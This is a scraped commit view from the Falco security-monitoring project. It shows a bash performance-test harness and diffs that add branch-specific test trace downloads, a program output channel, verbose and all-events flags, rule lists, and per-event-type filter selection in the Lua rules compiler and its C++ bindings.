docker-compose -f dc-juttle-engine.yml -f aws-cloudwatch/dc-aws-cloudwatch.yml -f elastic-newstracker/dc-elastic.yml -f github-tutorial/dc-elastic.yml -f nginx_logs/dc-nginx-logs.yml -f postgres-diskstats/dc-postgres.yml -f cadvisor-influx/dc-cadvisor-influx.yml stop
docker-compose -f dc-juttle-engine.yml -f aws-cloudwatch/dc-aws-cloudwatch.yml -f elastic-newstracker/dc-elastic.yml -f github-tutorial/dc-elastic.yml -f nginx_logs/dc-nginx-logs.yml -f postgres-diskstats/dc-postgres.yml -f cadvisor-influx/dc-cadvisor-influx.yml rm -fv
popd
}
function run_kubernetes_demo() {
pushd $SCRIPTDIR/../../infrastructure/test-infrastructures/kubernetes-demo
bash run-local.sh
bash init.sh
sleep 600
docker stop $(docker ps -qa)
docker rm -fv $(docker ps -qa)
popd
}
function run_live_test() {
live_test="$1"
echo "Running live test $live_test"
case "$live_test" in
htop ) CPU_INTERVAL=2;;
* ) CPU_INTERVAL=10;;
esac
start_subject_prog
start_monitor_cpu_usage
echo " starting live program and waiting for it to finish"
case "$live_test" in
htop ) run_htop ;;
juttle-examples ) run_juttle_examples ;;
kube-demo ) run_kubernetes_demo ;;
* ) usage; cleanup; exit 1 ;;
esac
cleanup
}
function cleanup() {
if [ -n "$SUBJ_PID" ] ; then
echo " stopping falco/sysdig program $SUBJ_PID"
sudo kill $SUBJ_PID
fi
if [ -n "$CPU_PID" ] ; then
echo " stopping cpu monitor program $CPU_PID"
kill -- -$CPU_PID
fi
}
run_live_tests() {
test="$1"
if [ $test == "all" ]; then
tests="htop juttle-examples kube-demo"
else
tests=$test
fi
for test in $tests; do
run_live_test $test
done
}
function run_phoronix_test() {
live_test="$1"
case "$live_test" in
pts/aio-stress | pts/fs-mark | pts/iozone | pts/network-loopback | pts/nginx | pts/pybench | pts/redis | pts/sqlite | pts/unpack-linux ) CPU_INTERVAL=2;;
* ) CPU_INTERVAL=10;;
esac
echo "Running phoronix test $live_test"
start_subject_prog
start_monitor_cpu_usage
echo " starting phoronix test and waiting for it to finish"
TEST_RESULTS_NAME=$VARIANT FORCE_TIMES_TO_RUN=1 phoronix-test-suite default-run $live_test
cleanup
}
# To install and configure phoronix:
# (redhat instructions, adapt as necessary for ubuntu or other distros)
# - install phoronix: yum install phoronix-test-suite.noarch
# - install dependencies not handled by phoronix: yum install libaio-devel pcre-devel popt-devel glibc-static zlib-devel nc bc
# - fix trivial bugs in tests:
# - edit ~/.phoronix-test-suite/installed-tests/pts/network-loopback-1.0.1/network-loopback line "nc -d -l 9999 > /dev/null &" to "nc -d -l 9999 > /dev/null &"
# - edit ~/.phoronix-test-suite/test-profiles/pts/nginx-1.1.0/test-definition.xml line "<Arguments>-n 500000 -c 100 http://localhost:8088/test.html</Arguments>" to "<Arguments>-n 500000 -c 100 http://127.0.0.1:8088/test.html</Arguments>"
# - phoronix batch-install <test list below>
function run_phoronix_tests() {
test="$1"
if [ $test == "all" ]; then
tests="pts/aio-stress pts/apache pts/blogbench pts/compilebench pts/dbench pts/fio pts/fs-mark pts/iozone pts/network-loopback pts/nginx pts/pgbench pts/phpbench pts/postmark pts/pybench pts/redis pts/sqlite pts/unpack-linux"
else
tests=$test
fi
for test in $tests; do
run_phoronix_test $test
done
}
run_tests() {
IFS=':' read -ra PARTS <<< "$TEST"
case "${PARTS[0]}" in
trace ) run_trace "${PARTS[1]}" ;;
live ) run_live_tests "${PARTS[1]}" ;;
phoronix ) run_phoronix_tests "${PARTS[1]}" ;;
* ) usage; exit 1 ;;
esac
}
usage() {
echo "Usage: $0 [options]"
echo ""
echo "Options:"
echo " -h/--help: show this help"
echo " -v/--variant: a variant name to attach to this set of test results"
echo " -r/--root: root directory containing falco/sysdig binaries (i.e. where you ran 'cmake')"
echo " -R/--results: append test results to this file"
echo " -o/--output: append program output to this file"
echo " -t/--test: test to run. Argument has the following format:"
echo " trace:<trace>: read the specified trace file."
echo " trace:all means run all traces"
echo " live:<live test>: run the specified live test."
echo " live:all means run all live tests."
echo " possible live tests:"
echo " live:htop: run htop -d2"
echo " live:kube-demo: run kubernetes demo from infrastructure repo"
echo " live:juttle-examples: run a juttle demo environment based on docker-compose"
echo " phoronix:<test>: run the specified phoronix test."
echo " if <test> is not 'all', it is passed directly to the command line of \"phoronix-test-suite run <test>\""
echo " if <test> is 'all', a built-in set of phoronix tests will be chosen and run"
echo " -T/--tracedir: Look for trace files in this directory. If doesn't exist, will download trace files from s3"
echo " -A/--agent-autodrop: When running an agent, whether or not to enable autodrop"
echo " -F/--falco-agent: When running an agent, whether or not to enable falco"
}
OPTS=`getopt -o hv:r:R:o:t:T: --long help,variant:,root:,results:,output:,test:,tracedir:,agent-autodrop:,falco-agent: -n $0 -- "$@"`
if [ $? != 0 ]; then
echo "Exiting" >&2
exit 1
fi
eval set -- "$OPTS"
VARIANT="falco"
ROOT=`dirname $0`/../build
SCRIPTDIR=`dirname $0`
RESULTS_FILE=`dirname $0`/results.json
OUTPUT_FILE=`dirname $0`/program-output.txt
TEST=trace:all
TRACEDIR=/tmp/falco-perf-traces.$USER
CPU_INTERVAL=10
AGENT_AUTODROP=1
FALCO_AGENT=1
while true; do
case "$1" in
-h | --help ) usage; exit 1;;
-v | --variant ) VARIANT="$2"; shift 2;;
-r | --root ) ROOT="$2"; shift 2;;
-R | --results ) RESULTS_FILE="$2"; shift 2;;
-o | --output ) OUTPUT_FILE="$2"; shift 2;;
-t | --test ) TEST="$2"; shift 2;;
-T | --tracedir ) TRACEDIR="$2"; shift 2;;
-A | --agent-autodrop ) AGENT_AUTODROP="$2"; shift 2;;
-F | --falco-agent ) FALCO_AGENT="$2"; shift 2;;
* ) break;;
esac
done
if [ -z $VARIANT ]; then
echo "A test variant name must be provided. Not continuing."
exit 1
fi
if [ -z $ROOT ]; then
echo "A root directory containing a falco/sysdig binary must be provided. Not continuing."
exit 1
fi
ROOT=`realpath $ROOT`
if [ -z $RESULTS_FILE ]; then
echo "An output file for test results must be provided. Not continuing."
exit 1
fi
if [ -z $OUTPUT_FILE ]; then
echo "An file for program output must be provided. Not continuing."
exit 1
fi
if [ -z $TEST ]; then
echo "A test must be provided. Not continuing."
exit 1
fi
run_tests

View File

@ -3,11 +3,13 @@
SCRIPT=$(readlink -f $0) SCRIPT=$(readlink -f $0)
SCRIPTDIR=$(dirname $SCRIPT) SCRIPTDIR=$(dirname $SCRIPT)
MULT_FILE=$SCRIPTDIR/falco_tests.yaml MULT_FILE=$SCRIPTDIR/falco_tests.yaml
BRANCH=$1
function download_trace_files() { function download_trace_files() {
echo "branch=$BRANCH"
for TRACE in traces-positive traces-negative traces-info ; do for TRACE in traces-positive traces-negative traces-info ; do
rm -rf $SCRIPTDIR/$TRACE rm -rf $SCRIPTDIR/$TRACE
curl -so $SCRIPTDIR/$TRACE.zip https://s3.amazonaws.com/download.draios.com/falco-tests/$TRACE.zip && curl -fso $SCRIPTDIR/$TRACE.zip https://s3.amazonaws.com/download.draios.com/falco-tests/$TRACE-$BRANCH.zip || curl -fso $SCRIPTDIR/$TRACE.zip https://s3.amazonaws.com/download.draios.com/falco-tests/$TRACE.zip &&
unzip -d $SCRIPTDIR $SCRIPTDIR/$TRACE.zip && unzip -d $SCRIPTDIR $SCRIPTDIR/$TRACE.zip &&
rm -rf $SCRIPTDIR/$TRACE.zip rm -rf $SCRIPTDIR/$TRACE.zip
done done
@ -34,7 +36,7 @@ EOF
} }
function prepare_multiplex_file() { function prepare_multiplex_file() {
echo "trace_files: !mux" > $MULT_FILE cp $SCRIPTDIR/falco_tests.yaml.in $MULT_FILE
prepare_multiplex_fileset traces-positive True Warning False prepare_multiplex_fileset traces-positive True Warning False
prepare_multiplex_fileset traces-negative False Warning True prepare_multiplex_fileset traces-negative False Warning True

View File

@ -54,6 +54,20 @@ void falco_configuration::init(string conf_filename, std::list<std::string> &cmd
m_outputs.push_back(syslog_output); m_outputs.push_back(syslog_output);
} }
output_config program_output;
program_output.name = "program";
if (m_config->get_scalar<bool>("program_output", "enabled", false))
{
string program;
program = m_config->get_scalar<string>("program_output", "program", "");
if (program == string(""))
{
throw sinsp_exception("Error reading config file (" + m_config_file + "): program output enabled but no program in configuration block");
}
program_output.options["program"] = program;
m_outputs.push_back(program_output);
}
if (m_outputs.size() == 0) if (m_outputs.size() == 0)
{ {
throw sinsp_exception("Error reading config file (" + m_config_file + "): No outputs configured. Please configure at least one output file output enabled but no filename in configuration block"); throw sinsp_exception("Error reading config file (" + m_config_file + "): No outputs configured. Please configure at least one output file output enabled but no filename in configuration block");

View File

@ -55,6 +55,8 @@ static void usage()
" -r <rules_file> Rules file (defaults to value set in configuration file, or /etc/falco_rules.yaml).\n" " -r <rules_file> Rules file (defaults to value set in configuration file, or /etc/falco_rules.yaml).\n"
" -L Show the name and description of all rules and exit.\n" " -L Show the name and description of all rules and exit.\n"
" -l <rule> Show the name and description of the rule with name <rule> and exit.\n" " -l <rule> Show the name and description of the rule with name <rule> and exit.\n"
" -v Verbose output.\n"
" -A Monitor all events, including those with EF_DROP_FALCO flag.\n"
"\n" "\n"
); );
} }
@ -253,6 +255,8 @@ int falco_init(int argc, char **argv)
string pidfilename = "/var/run/falco.pid"; string pidfilename = "/var/run/falco.pid";
bool describe_all_rules = false; bool describe_all_rules = false;
string describe_rule = ""; string describe_rule = "";
bool verbose = false;
bool all_events = false;
static struct option long_options[] = static struct option long_options[] =
{ {
@ -272,7 +276,7 @@ int falco_init(int argc, char **argv)
// Parse the args // Parse the args
// //
while((op = getopt_long(argc, argv, while((op = getopt_long(argc, argv,
"c:ho:e:r:dp:Ll:", "c:ho:e:r:dp:Ll:vA",
long_options, &long_index)) != -1) long_options, &long_index)) != -1)
{ {
switch(op) switch(op)
@ -301,6 +305,12 @@ int falco_init(int argc, char **argv)
case 'L': case 'L':
describe_all_rules = true; describe_all_rules = true;
break; break;
case 'v':
verbose = true;
break;
case 'A':
all_events = true;
break;
case 'l': case 'l':
describe_rule = optarg; describe_rule = optarg;
break; break;
@ -394,11 +404,14 @@ int falco_init(int argc, char **argv)
falco_fields::init(inspector, ls); falco_fields::init(inspector, ls);
falco_logger::init(ls); falco_logger::init(ls);
falco_rules::init(ls);
if(!all_events)
{
inspector->set_drop_event_flags(EF_DROP_FALCO); inspector->set_drop_event_flags(EF_DROP_FALCO);
rules->load_rules(config.m_rules_filename); }
inspector->set_filter(rules->get_filter()); rules->load_rules(config.m_rules_filename, verbose, all_events);
falco_logger::log(LOG_INFO, "Parsed rules from file " + config.m_rules_filename + "\n"); falco_logger::log(LOG_INFO, "Parsed rules from file " + config.m_rules_filename + "\n");
if (describe_all_rules) if (describe_all_rules)

View File

@ -1,6 +1,18 @@
local parser = require("parser") local parser = require("parser")
local compiler = {} local compiler = {}
compiler.verbose = false
compiler.all_events = false
function compiler.set_verbose(verbose)
compiler.verbose = verbose
parser.set_verbose(verbose)
end
function compiler.set_all_events(all_events)
compiler.all_events = all_events
end
function map(f, arr) function map(f, arr)
local res = {} local res = {}
for i,v in ipairs(arr) do for i,v in ipairs(arr) do
@ -153,10 +165,111 @@ function check_for_ignored_syscalls_events(ast, filter_type, source)
end end
end end
parser.traverse_ast(ast, "BinaryRelOp", cb) parser.traverse_ast(ast, {BinaryRelOp=1}, cb)
end
-- Examine the ast and find the event types for which the rule should
-- run. All evt.type references are added as event types up until the
-- first "!=" binary operator or unary not operator. If no event type
-- checks are found afterward in the rule, the rule is considered
-- optimized and is associated with the event type(s).
--
-- Otherwise, the rule is associated with a 'catchall' category and is
-- run for all event types. (Also, a warning is printed).
--
function get_evttypes(name, ast, source)
local evttypes = {}
local evtnames = {}
local found_event = false
local found_not = false
local found_event_after_not = false
function cb(node)
if node.type == "UnaryBoolOp" then
if node.operator == "not" then
found_not = true
end
else
if node.operator == "!=" then
found_not = true
end
if node.left.type == "FieldName" and node.left.value == "evt.type" then
found_event = true
if found_not then
found_event_after_not = true
end
if node.operator == "in" then
for i, v in ipairs(node.right.elements) do
if v.type == "BareString" then
evtnames[v.value] = 1
for id in string.gmatch(events[v.value], "%S+") do
evttypes[id] = 1
end
end
end
else
if node.right.type == "BareString" then
evtnames[node.right.value] = 1
for id in string.gmatch(events[node.right.value], "%S+") do
evttypes[id] = 1
end
end
end
end
end
end
parser.traverse_ast(ast.filter.value, {BinaryRelOp=1, UnaryBoolOp=1} , cb)
if not found_event then
io.stderr:write("Rule "..name..": warning (no-evttype):\n")
io.stderr:write(source.."\n")
io.stderr:write(" did not contain any evt.type restriction, meaning it will run for all event types.\n")
io.stderr:write(" This has a significant performance penalty. Consider adding an evt.type restriction if possible.\n")
evttypes = {}
evtnames = {}
end
if found_event_after_not then
io.stderr:write("Rule "..name..": warning (trailing-evttype):\n")
io.stderr:write(source.."\n")
io.stderr:write(" does not have all evt.type restrictions at the beginning of the condition,\n")
io.stderr:write(" or uses a negative match (i.e. \"not\"/\"!=\") for some evt.type restriction.\n")
io.stderr:write(" This has a performance penalty, as the rule can not be limited to specific event types.\n")
io.stderr:write(" Consider moving all evt.type restrictions to the beginning of the rule and/or\n")
io.stderr:write(" replacing negative matches with positive matches if possible.\n")
evttypes = {}
evtnames = {}
end
evtnames_only = {}
local num_evtnames = 0
for name, dummy in pairs(evtnames) do
table.insert(evtnames_only, name)
num_evtnames = num_evtnames + 1
end
if num_evtnames == 0 then
table.insert(evtnames_only, "all")
end
table.sort(evtnames_only)
if compiler.verbose then
io.stderr:write("Event types for rule "..name..": "..table.concat(evtnames_only, ",").."\n")
end
return evttypes
end
function compiler.compile_macro(line, list_defs)
for name, items in pairs(list_defs) do
line = string.gsub(line, name, table.concat(items, ", "))
end end
function compiler.compile_macro(line)
local ast, error_msg = parser.parse_filter(line) local ast, error_msg = parser.parse_filter(line)
if (error_msg) then if (error_msg) then
@ -166,7 +279,9 @@ function compiler.compile_macro(line)
-- Traverse the ast looking for events/syscalls in the ignored -- Traverse the ast looking for events/syscalls in the ignored
-- syscalls table. If any are found, return an error. -- syscalls table. If any are found, return an error.
if not compiler.all_events then
check_for_ignored_syscalls_events(ast, 'macro', line) check_for_ignored_syscalls_events(ast, 'macro', line)
end
return ast return ast
end end
@ -174,7 +289,12 @@ end
--[[ --[[
Parses a single filter, then expands macros using passed-in table of definitions. Returns resulting AST. Parses a single filter, then expands macros using passed-in table of definitions. Returns resulting AST.
--]] --]]
function compiler.compile_filter(source, macro_defs) function compiler.compile_filter(name, source, macro_defs, list_defs)
for name, items in pairs(list_defs) do
source = string.gsub(source, name, table.concat(items, ", "))
end
local ast, error_msg = parser.parse_filter(source) local ast, error_msg = parser.parse_filter(source)
if (error_msg) then if (error_msg) then
@ -184,7 +304,9 @@ function compiler.compile_filter(source, macro_defs)
-- Traverse the ast looking for events/syscalls in the ignored -- Traverse the ast looking for events/syscalls in the ignored
-- syscalls table. If any are found, return an error. -- syscalls table. If any are found, return an error.
if not compiler.all_events then
check_for_ignored_syscalls_events(ast, 'rule', source) check_for_ignored_syscalls_events(ast, 'rule', source)
end
if (ast.type == "Rule") then if (ast.type == "Rule") then
-- Line is a filter, so expand macro references -- Line is a filter, so expand macro references
@ -196,7 +318,9 @@ function compiler.compile_filter(source, macro_defs)
error("Unexpected top-level AST type: "..ast.type) error("Unexpected top-level AST type: "..ast.type)
end end
return ast evttypes = get_evttypes(name, ast, source)
return ast, evttypes
end end

View File

@ -27,7 +27,7 @@ function mod.file_validate(options)
end end
function mod.file(evt, rule, level, format, options) function mod.file(evt, rule, level, format, options)
format = "%evt.time: "..levels[level+1].." "..format format = "*%evt.time: "..levels[level+1].." "..format
formatter = falco.formatter(format) formatter = falco.formatter(format)
msg = falco.format_event(evt, rule, levels[level+1], formatter) msg = falco.format_event(evt, rule, levels[level+1], formatter)
@ -43,6 +43,22 @@ function mod.syslog(evt, rule, level, format)
falco.syslog(level, msg) falco.syslog(level, msg)
end end
function mod.program(evt, rule, level, format, options)
format = "*%evt.time: "..levels[level+1].." "..format
formatter = falco.formatter(format)
msg = falco.format_event(evt, rule, levels[level+1], formatter)
-- XXX Ideally we'd check that the program ran
-- successfully. However, the luajit we're using returns true even
-- when the shell can't run the program.
file = io.popen(options.program, "w")
file:write(msg, "\n")
file:close()
end
function mod.event(event, rule, level, format) function mod.event(event, rule, level, format)
for index,o in ipairs(outputs) do for index,o in ipairs(outputs) do
o.output(event, rule, level, format, o.config) o.output(event, rule, level, format, o.config)

View File

@ -11,6 +11,12 @@
local parser = {} local parser = {}
parser.verbose = false
function parser.set_verbose(verbose)
parser.verbose = verbose
end
local lpeg = require "lpeg" local lpeg = require "lpeg"
lpeg.locale(lpeg) lpeg.locale(lpeg)
@ -236,7 +242,8 @@ local G = {
symb("<") / "<" + symb("<") / "<" +
symb(">") / ">" + symb(">") / ">" +
symb("contains") / "contains" + symb("contains") / "contains" +
symb("icontains") / "icontains"; symb("icontains") / "icontains" +
symb("startswith") / "startswith";
InOp = kw("in") / "in"; InOp = kw("in") / "in";
UnaryBoolOp = kw("not") / "not"; UnaryBoolOp = kw("not") / "not";
ExistsOp = kw("exists") / "exists"; ExistsOp = kw("exists") / "exists";
@ -296,33 +303,33 @@ parser.print_ast = print_ast
-- have the signature: -- have the signature:
-- cb(ast_node, ctx) -- cb(ast_node, ctx)
-- ctx is optional. -- ctx is optional.
function traverse_ast(ast, node_type, cb, ctx) function traverse_ast(ast, node_types, cb, ctx)
local t = ast.type local t = ast.type
if t == node_type then if node_types[t] ~= nil then
cb(ast, ctx) cb(ast, ctx)
end end
if t == "Rule" then if t == "Rule" then
traverse_ast(ast.filter, node_type, cb, ctx) traverse_ast(ast.filter, node_types, cb, ctx)
elseif t == "Filter" then elseif t == "Filter" then
traverse_ast(ast.value, node_type, cb, ctx) traverse_ast(ast.value, node_types, cb, ctx)
elseif t == "BinaryBoolOp" or t == "BinaryRelOp" then elseif t == "BinaryBoolOp" or t == "BinaryRelOp" then
traverse_ast(ast.left, node_type, cb, ctx) traverse_ast(ast.left, node_types, cb, ctx)
traverse_ast(ast.right, node_type, cb, ctx) traverse_ast(ast.right, node_types, cb, ctx)
elseif t == "UnaryRelOp" or t == "UnaryBoolOp" then elseif t == "UnaryRelOp" or t == "UnaryBoolOp" then
traverse_ast(ast.argument, node_type, cb, ctx) traverse_ast(ast.argument, node_types, cb, ctx)
elseif t == "List" then elseif t == "List" then
for i, v in ipairs(ast.elements) do for i, v in ipairs(ast.elements) do
traverse_ast(v, node_type, cb, ctx) traverse_ast(v, node_types, cb, ctx)
end end
elseif t == "MacroDef" then elseif t == "MacroDef" then
traverse_ast(ast.value, node_type, cb, ctx) traverse_ast(ast.value, node_types, cb, ctx)
elseif t == "FieldName" or t == "Number" or t == "String" or t == "BareString" or t == "Macro" then elseif t == "FieldName" or t == "Number" or t == "String" or t == "BareString" or t == "Macro" then
-- do nothing, no traversal needed -- do nothing, no traversal needed

View File

@ -115,9 +115,12 @@ end
-- object. The by_name index is used for things like describing rules, -- object. The by_name index is used for things like describing rules,
-- and the by_idx index is used to map the relational node index back -- and the by_idx index is used to map the relational node index back
-- to a rule. -- to a rule.
local state = {macros={}, filter_ast=nil, rules_by_name={}, n_rules=0, rules_by_idx={}} local state = {macros={}, lists={}, filter_ast=nil, rules_by_name={}, n_rules=0, rules_by_idx={}}
function load_rules(filename) function load_rules(filename, rules_mgr, verbose, all_events)
compiler.set_verbose(verbose)
compiler.set_all_events(all_events)
local f = assert(io.open(filename, "r")) local f = assert(io.open(filename, "r"))
local s = f:read("*all") local s = f:read("*all")
@ -131,9 +134,28 @@ function load_rules(filename)
end end
if (v['macro']) then if (v['macro']) then
local ast = compiler.compile_macro(v['condition']) local ast = compiler.compile_macro(v['condition'], state.lists)
state.macros[v['macro']] = ast.filter.value state.macros[v['macro']] = ast.filter.value
elseif (v['list']) then
-- list items are represented in yaml as a native list, so no
-- parsing necessary
local items = {}
-- List items may be references to other lists, so go through
-- the items and expand any references to the items in the list
for i, item in ipairs(v['items']) do
if (state.lists[item] == nil) then
items[#items+1] = item
else
for i, exp_item in ipairs(state.lists[item]) do
items[#items+1] = exp_item
end
end
end
state.lists[v['list']] = items
else -- rule else -- rule
if (v['rule'] == nil) then if (v['rule'] == nil) then
@ -150,7 +172,8 @@ function load_rules(filename)
v['level'] = priority(v['priority']) v['level'] = priority(v['priority'])
state.rules_by_name[v['rule']] = v state.rules_by_name[v['rule']] = v
local filter_ast = compiler.compile_filter(v['condition'], state.macros) local filter_ast, evttypes = compiler.compile_filter(v['rule'], v['condition'],
state.macros, state.lists)
if (filter_ast.type == "Rule") then if (filter_ast.type == "Rule") then
state.n_rules = state.n_rules + 1 state.n_rules = state.n_rules + 1
@ -164,6 +187,11 @@ function load_rules(filename)
-- event. -- event.
mark_relational_nodes(filter_ast.filter.value, state.n_rules) mark_relational_nodes(filter_ast.filter.value, state.n_rules)
install_filter(filter_ast.filter.value)
-- Pass the filter and event types back up
falco_rules.add_filter(rules_mgr, evttypes)
-- Rule ASTs are merged together into one big AST, with "OR" between each -- Rule ASTs are merged together into one big AST, with "OR" between each
-- rule. -- rule.
if (state.filter_ast == nil) then if (state.filter_ast == nil) then
@ -177,7 +205,6 @@ function load_rules(filename)
end end
end end
install_filter(state.filter_ast)
io.flush() io.flush()
end end

View File

@ -1,4 +1,5 @@
#include "rules.h" #include "rules.h"
#include "logger.h"
extern "C" { extern "C" {
#include "lua.h" #include "lua.h"
@ -6,6 +7,11 @@ extern "C" {
#include "lauxlib.h" #include "lauxlib.h"
} }
const static struct luaL_reg ll_falco_rules [] =
{
{"add_filter", &falco_rules::add_filter},
{NULL,NULL}
};
falco_rules::falco_rules(sinsp* inspector, lua_State *ls, string lua_main_filename) falco_rules::falco_rules(sinsp* inspector, lua_State *ls, string lua_main_filename)
{ {
@ -17,6 +23,48 @@ falco_rules::falco_rules(sinsp* inspector, lua_State *ls, string lua_main_filena
load_compiler(lua_main_filename); load_compiler(lua_main_filename);
} }
void falco_rules::init(lua_State *ls)
{
luaL_openlib(ls, "falco_rules", ll_falco_rules, 0);
}
int falco_rules::add_filter(lua_State *ls)
{
if (! lua_islightuserdata(ls, -2) ||
! lua_istable(ls, -1))
{
falco_logger::log(LOG_ERR, "Invalid arguments passed to add_filter()\n");
throw sinsp_exception("add_filter error");
}
falco_rules *rules = (falco_rules *) lua_topointer(ls, -2);
list<uint32_t> evttypes;
lua_pushnil(ls); /* first key */
while (lua_next(ls, -2) != 0) {
// key is at index -2, value is at index
// -1. We want the keys.
evttypes.push_back(luaL_checknumber(ls, -2));
// Remove value, keep key for next iteration
lua_pop(ls, 1);
}
rules->add_filter(evttypes);
return 0;
}
void falco_rules::add_filter(list<uint32_t> &evttypes)
{
// While the current rule was being parsed, a sinsp_filter
// object was being populated by lua_parser. Grab that filter
// and pass it to the inspector.
sinsp_filter *filter = m_lua_parser->get_filter(true);
m_inspector->add_evttype_filter(evttypes, filter);
}
void falco_rules::load_compiler(string lua_main_filename) void falco_rules::load_compiler(string lua_main_filename)
{ {
@ -40,18 +88,47 @@ void falco_rules::load_compiler(string lua_main_filename)
} }
} }
void falco_rules::load_rules(string rules_filename) void falco_rules::load_rules(string rules_filename, bool verbose, bool all_events)
{ {
lua_getglobal(m_ls, m_lua_load_rules.c_str()); lua_getglobal(m_ls, m_lua_load_rules.c_str());
if(lua_isfunction(m_ls, -1)) if(lua_isfunction(m_ls, -1))
{ {
// Create a table containing all events, so they can
// be mapped to event ids.
sinsp_evttables* einfo = m_inspector->get_event_info_tables();
const struct ppm_event_info* etable = einfo->m_event_info;
const struct ppm_syscall_desc* stable = einfo->m_syscall_info_table;
map<string,string> events_by_name;
for(uint32_t j = 0; j < PPM_EVENT_MAX; j++)
{
auto it = events_by_name.find(etable[j].name);
if (it == events_by_name.end()) {
events_by_name[etable[j].name] = to_string(j);
} else {
string cur = it->second;
cur += " ";
cur += to_string(j);
events_by_name[etable[j].name] = cur;
}
}
lua_newtable(m_ls);
for( auto kv : events_by_name)
{
lua_pushstring(m_ls, kv.first.c_str());
lua_pushstring(m_ls, kv.second.c_str());
lua_settable(m_ls, -3);
}
lua_setglobal(m_ls, m_lua_events.c_str());
// Create a table containing the syscalls/events that // Create a table containing the syscalls/events that
// are ignored by the kernel module. load_rules will // are ignored by the kernel module. load_rules will
// return an error if any rule references one of these // return an error if any rule references one of these
// syscalls/events. // syscalls/events.
sinsp_evttables* einfo = m_inspector->get_event_info_tables();
const struct ppm_event_info* etable = einfo->m_event_info;
const struct ppm_syscall_desc* stable = einfo->m_syscall_info_table;
lua_newtable(m_ls); lua_newtable(m_ls);
@ -82,7 +159,10 @@ void falco_rules::load_rules(string rules_filename)
lua_setglobal(m_ls, m_lua_ignored_syscalls.c_str()); lua_setglobal(m_ls, m_lua_ignored_syscalls.c_str());
lua_pushstring(m_ls, rules_filename.c_str()); lua_pushstring(m_ls, rules_filename.c_str());
if(lua_pcall(m_ls, 1, 0, 0) != 0) lua_pushlightuserdata(m_ls, this);
lua_pushboolean(m_ls, (verbose ? 1 : 0));
lua_pushboolean(m_ls, (all_events ? 1 : 0));
if(lua_pcall(m_ls, 4, 0, 0) != 0)
{ {
const char* lerr = lua_tostring(m_ls, -1); const char* lerr = lua_tostring(m_ls, -1);
string err = "Error loading rules:" + string(lerr); string err = "Error loading rules:" + string(lerr);

View File

@ -1,5 +1,7 @@
#pragma once #pragma once
#include <list>
#include "sinsp.h" #include "sinsp.h"
#include "lua_parser.h" #include "lua_parser.h"
@ -8,13 +10,18 @@ class falco_rules
public: public:
falco_rules(sinsp* inspector, lua_State *ls, string lua_main_filename); falco_rules(sinsp* inspector, lua_State *ls, string lua_main_filename);
~falco_rules(); ~falco_rules();
void load_rules(string rules_filename); void load_rules(string rules_filename, bool verbose, bool all_events);
void describe_rule(string *rule); void describe_rule(string *rule);
sinsp_filter* get_filter(); sinsp_filter* get_filter();
static void init(lua_State *ls);
static int add_filter(lua_State *ls);
private: private:
void load_compiler(string lua_main_filename); void load_compiler(string lua_main_filename);
void add_filter(list<uint32_t> &evttypes);
lua_parser* m_lua_parser; lua_parser* m_lua_parser;
sinsp* m_inspector; sinsp* m_inspector;
lua_State* m_ls; lua_State* m_ls;
@ -22,6 +29,7 @@ class falco_rules
string m_lua_load_rules = "load_rules"; string m_lua_load_rules = "load_rules";
string m_lua_ignored_syscalls = "ignored_syscalls"; string m_lua_ignored_syscalls = "ignored_syscalls";
string m_lua_ignored_events = "ignored_events"; string m_lua_ignored_events = "ignored_events";
string m_lua_events = "events";
string m_lua_on_event = "on_event"; string m_lua_on_event = "on_event";
string m_lua_describe_rule = "describe_rule"; string m_lua_describe_rule = "describe_rule";
}; };